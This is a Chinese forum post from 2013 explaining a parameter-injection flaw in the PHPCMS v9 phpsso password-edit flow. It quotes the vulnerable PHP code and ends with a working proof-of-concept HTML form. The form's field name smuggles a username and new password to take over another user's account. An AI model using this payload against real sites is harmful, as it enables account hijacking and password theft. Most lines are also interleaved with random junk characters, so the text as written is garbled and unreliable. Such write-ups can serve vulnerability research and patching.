提到的通行证的代码:7 b. d* d/ e$ C7 }9 |9 ~4 Z
+ ^5 p( C- t$ s1 R! g+ _$ H" J. I* t; z- M% O
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);0 B: M( x; `% k, J- e6 a
# i. }8 j4 ~8 |9 b3 ~/ B在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
+ i' h7 A/ V& w: J J, w2 @% E0 K+ Z- \. G4 q) i
我把它留给了你们。
* ^6 C/ A% N6 a; p1 U0 v" @: {不知道你们发现了它没有。+ l; ~, ?2 x B5 c
W4 }( w3 k% ^1 e我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
) G' x y5 M% p6 g X, v
I! t) m9 u9 `$ ?/ r; t所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
1 Y& n# {- w; l; f% V" T" d* F3 K
9 ~6 @ i4 B7 l- y( z5 U+ P也就是
) e+ ~' V3 y$ A" W8 u0 y4 Z2 R) u+ |4 N% d4 h9 \! ^- H- z
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。
* ?. U5 O) M8 A
5 d1 h* k0 w2 u要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。! M1 s9 U; X: k( b
9 E5 u9 T6 g' j* ~5 I2 [5 A& Y* K# ~6 W9 @9 Y
其实我们有这样的机会,看看代码,如下:* R& N( `9 T" p* t% t, u4 G
2 k7 L( p! ~& U% c6 N; O( p4 _& W) U* ~) T' T U1 ? u
public function auth_data($data) {
" K! [, d3 w6 P H( Q9 T: }: y $s = $sep = '';
$ x$ a+ N/ Z ?1 o5 P, ] foreach($data as $k => $v) {6 a6 C$ n2 i5 R1 _
if(is_array($v)) {
! s- |" u3 Y9 P $s2 = $sep2 = ''; m! N' H$ u s0 J, w4 k
foreach($v as $k2 => $v2) {3 ~$ K" k; l M2 ~
$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
5 G9 {! R: n: b5 q* t1 Y $sep2 = '&';
0 v& S& D9 Z2 f) | }, y& t R0 x2 z; k
$s .= $sep.$s2;
0 b. \& X+ N$ c# i } else {& V1 p5 l8 m4 }; B& H( y/ N) _) q
$s .= "$sep$k=".$this->_ps_stripslashes($v);
: |+ r- P; p" u0 m# O }% m+ B6 q' }1 o2 n( c9 s% q, \& O! G
$sep = '&';& ]0 {; A, ~8 l) |6 f
}
O9 p J, g f" j4 ~. ^
2 u" U4 X4 E$ H* A+ s $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
8 z, \0 a% v6 ]" M* Z. q" E return $auth_s;2 S1 B5 D9 T2 I3 z3 [/ a
}
8 M. Q* T2 z0 F4 x1 ]" n& b2 o1 C8 Z4 G% f) b
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。0 S9 c( ]& a1 U& m/ o( `
+ F2 @9 A1 G4 n3 J5 f举个例子
6 k3 `$ ?' L* r. M1 q
# Z/ A7 z4 M8 F7 v5 w( L& M+ M$a[aaa=a&bbb] = 'a';) t! t& |, ~ x* R( ]! q
! Z" L' I4 I ^会变成aaa=a&bbb=a; {, P4 a& k7 Z5 C& q/ {' z8 X
/ ~" _0 M" b) _' |明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。9 k6 y3 C( b$ P: ^+ x
- s% l7 d! w& R' T* L5 {
这个时候,我们可以再去看一个函数。
9 N4 y( E" W5 F. r% ]! H9 \
7 Y7 K- j# ~) Z+ P0 B就在这个文件内:1 c; A3 n+ P+ I# L5 _
/ L0 I9 i& n% E8 w9 W. r' I9 b( |. y8 A4 F. E" ?9 R* G
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
2 {7 l# [1 N+ d% r# o2 {1 b( D if($email && !$this->_is_email($email)) {0 H, Y$ Z+ P6 ? d5 ^
return -4;
. r( B- [% G5 \3 o, A9 v$ P( c! t }
5 B8 I4 M: h; P; J return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
& F" K4 ?4 w; _! o: S$ j& O }! B$ V% K, t! d. [) I( G
8 |3 L& E! i* a2 X/ ^ U这是向通行证发了这样一个请求。
+ ^; j# ~2 _2 n$ u% d. u+ j" @; \5 U
8 ]3 Y, E: E' l, F$ n( Q) ~我们再跟到通信证代码里去看看,就会有所发现。
3 D) A7 p5 W% Z1 @2 b- b
/ o3 f9 T' |6 F' p5 i" C9 U" D/ r3 D' v$ h
public function edit() {
+ E7 g3 I4 v! u# `0 c//能省就省,太长了不是吗?
2 f# f. \7 H6 B, j
# {8 M5 s" b6 M6 w* T. Nif($this->username) {( C* r) d2 o5 R w# w" G
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
( N. c) G6 I& g. U2 j $res = $this->db->update($data, array('username'=>$this->username));
. m6 L4 x* ]9 c0 ~( r6 B' o } else {5 g& i6 |- u* [# R6 H3 ?$ I4 I( b/ _
file_put_contents('typeb.txt',print_r($data,1).$this->uid);
( [" v1 S- L) s& D8 n $res = $this->db->update($data, array('uid'=>$this->uid));1 w- h- g: w6 F, f' L$ }6 a; ]8 B
}
# M/ N5 p* s6 v3 X3 p% A2 X- ?" v* Y9 h+ a; K+ W
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:0 @: \/ G. n. T7 f
1 P% A" c+ g1 O% K; |public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
& a6 U' U% l7 Y6 Q, c% V3 e3 p5 p% L
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
9 \ C. T6 J( u4 V- b$ \3 {- x$ I( h! U5 ^
我当然找到了:+ l! ]9 I5 D6 Y
phpcms9/phpcms/modules/member/index.php. G& i j& A. N, o( M+ D. ^1 |
! {1 f7 v' p; b9 o* @! }$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);6 G5 M* ?0 N3 Y, ~6 L. B( Z
! L S; k: P- G1 y4 k% ]
然后就没有然后了。8 d! j5 g$ i( L: E; C* N* q
: P% {% K/ W5 A+ W. m* K
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">+ S# n' k' c, _ s. a
<table width="100%" cellspacing="0" class="table_form">" N+ `! |: }6 _% Q
<tr>4 N6 M, z I' g$ `! [8 p& {
<th width="80">邮箱:</th> / `- A/ I+ D& t* Z0 {6 C6 L: t
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
! D& G W! e2 b# U& u </tr>
: M4 E$ p( h/ O1 n6 b. ? <tr>
3 F/ k; L D& M3 s) y <th width="80">原密码:</th> 6 o$ p1 l( _% J3 E9 c3 S) c3 b
<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
. F# e+ y# v$ F1 Z$ a; i* E9 H </tr>' @2 g) d/ j6 ]1 O" Y# b
<tr>/ {1 x9 u- u# c/ G7 E# ^3 j# S2 W
<th>新密码:</th>
* ]4 }, s/ U. D+ i, h6 @ <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>- h4 V! L& l: t7 c6 H
</tr>
9 u- @- @& C" d K6 F <th></th>% u% N8 F/ c0 [! w' w7 ~
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>9 p Y( M/ k$ f, Q6 g
</tr>4 `* ~3 m# k5 ?' Y& R7 [" L
</table>/ ~' \8 O9 ]# t$ o( `& d* d
1 P# I: V0 P9 }" I1 Y' B0 s) p3 t" m
, q1 q& t5 S& k2 o/ p6 f0 U4 l
</form>7 ^. A" Z) P0 s# a, q
|
发表于 2013-2-23 14:46:35
收藏
支持
反对